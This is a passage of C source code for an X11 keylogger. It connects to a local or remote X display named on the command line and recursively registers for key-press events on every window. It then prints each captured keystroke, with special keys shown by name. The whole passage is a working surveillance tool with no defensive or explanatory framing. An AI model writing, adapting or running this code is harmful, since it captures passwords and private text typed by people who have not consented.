char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)
{
    static int level = 0;
    Window parent, *children, *child2;
    unsigned int nchildren;
    int stat, i,j,k;

     level++;

     stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
     if (stat == FALSE)
     {
	 fprintf(stderr, "fnord.. nix is :/\n");
	 return;
     } //

     if (nchildren == 0)
	 return;

     XSelectInput(d, root, type);
     for(i=0; i < nchildren; i++)
     {
	 XSelectInput(d, children[i], type);
	 snoop_all_windows(children[i], type);
     } //

     XFree((char *)children);
} //


void main(int argc, char **argv)
{
    char *hostname;
    char *string;
    XEvent xev;
    int count = 0;

    if (argv[1] == NULL)
	hostname = ":0";
    else
	hostname = argv[1];

    d = XOpenDisplay(hostname);
    if (d == NULL)
    {
	fprintf(stderr, "hurgs.. kann ``display'' nicht oeffnen: %s\n", hostname);
	exit(10);
    } //

    snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

    while(1)
   {
       XNextEvent(d, &xev);

       string = TranslateKeyCode(&xev);
       if (string == NULL)
	   continue;

       if (*string == '\r')
	   printf("\n");
       else if (strlen(string) == 1)
	   printf("%s", string);
       else
	   printf("<<%s>>", string);
       fflush(stdout);
   } //
} //

char *TranslateKeyCode(XEvent *ev)
{
    int count;
    char *tmp;
    KeySym ks;

    if (ev)
    {
	count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
	key_buff[count] = '\0';

	if (count == 0)
	{
	    tmp = XKeysymToString(ks);
	    if (tmp)
		strcpy(key_buff, tmp);
	    else
		strcpy(key_buff, "");
	} //

	return key_buff;
    } //

    else
	return NULL;
} //
